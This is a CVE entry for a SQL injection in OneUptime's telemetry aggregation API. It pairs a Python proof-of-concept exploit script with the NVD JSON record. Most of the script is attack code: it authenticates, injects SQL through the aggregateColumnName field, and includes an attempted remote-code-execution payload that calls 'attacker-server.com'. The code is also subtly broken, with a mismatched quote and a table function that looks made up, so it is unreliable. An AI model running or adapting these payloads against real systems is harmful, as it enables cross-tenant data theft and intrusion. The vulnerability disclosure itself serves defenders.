CVE-2026-32306

#!/usr/bin/env python3 """ CVE-2026-32306 PoC - OneUptime SQL Injection in Telemetry Aggregation API Note: This is for educational and authorized testing purposes only. """ import requests import json TARGET_URL = "https://target-oneuptime-instance.com" API_ENDPOINT = "/api/telemetry/aggregate" USERNAME = "[email protected]" PASSWORD = "password123" def get_auth_token(): """Authenticate and get access token""" login_url = f"{TARGET_URL}/api/account/login" payload = { "email": USERNAME, "password": PASSWORD } response = requests.post(login_url, json=payload, verify=False) if response.status_code == 200: return response.json().get('token') return None def exploit_sql_injection(token): """Exploit SQL injection to extract database info""" headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } # Malicious payload - extracts ClickHouse version payload = { "aggregationType": "groupBy', "aggregateColumnName": "(SELECT version())-- ", "aggregationTimestampColumnName": "createdAt" } response = requests.post( f"{TARGET_URL}{API_ENDPOINT}", json=payload, headers=headers, verify=False ) print(f"Status: {response.status_code}") print(f"Response: {response.text}") return response def exploit_rce_via_clickhouse_remote(token): """Attempt RCE via ClickHouse table functions""" headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } # Payload for potential remote code execution payload = { "aggregationType": "sum", "aggregateColumnName": "_clickhouse_remote('attacker-server.com', 'malicious_query')", "aggregationTimestampColumnName": "createdAt" } response = requests.post( f"{TARGET_URL}{API_ENDPOINT}", json=payload, headers=headers, verify=False ) return response if __name__ == "__main__": print("CVE-2026-32306 OneUptime SQL Injection PoC") print("=" * 50) # Step 1: Authenticate token = get_auth_token() if not token: print("[-] Authentication failed") exit(1) print("[+] Authentication successful") # Step 2: Exploit SQL injection print("[*] Attempting SQL injection...") exploit_sql_injection(token)

{"cve": {"id": "CVE-2026-32306", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:42.000", "lastModified": "2026-03-17T20:08:56.733", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OneUptime is a solution for monitoring and managing online services. Prior to 10.0.23, the telemetry aggregation API accepts user-controlled aggregationType, aggregateColumnName, and aggregationTimestampColumnName parameters and interpolates them directly into ClickHouse SQL queries via the .append() method (documented as \"trusted SQL\"). There is no allowlist, no parameterized query binding, and no input validation. An authenticated user can inject arbitrary SQL into ClickHouse, enabling full database read (including telemetry data from all tenants), data modification, and potential remote code execution via ClickHouse table functions. This vulnerability is fixed in 10.0.23."}, {"lang": "es", "value": "OneUptime es una solución para monitorear y gestionar servicios en línea. Antes de la 10.0.23, la API de agregación de telemetría acepta los parámetros controlados por el usuario aggregationType, aggregateColumnName y aggregationTimestampColumnName y los interpola directamente en las consultas SQL de ClickHouse a través del método .append() (documentado como 'SQL de confianza'). No hay lista blanca, no hay enlace de consulta parametrizada y no hay validación de entrada. Un usuario autenticado puede inyectar SQL arbitrario en ClickHouse, lo que permite la lectura completa de la base de datos (incluidos los datos de telemetría de todos los inquilinos), la modificación de datos y la potencial ejecución remota de código a través de funciones de tabla de ClickHouse. Esta vulnerabilidad está corregida en la 10.0.23."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hackerbay:oneuptime:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.23", "matchCriteriaId": "AF2F89C2-1AB8-4611-9B0B-A4CFA02C807E"}]}]}], "references": [{"url": "https://github.com/OneUptime/oneuptime/security/advisories/GHSA-p5g2-jm85-8g35", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}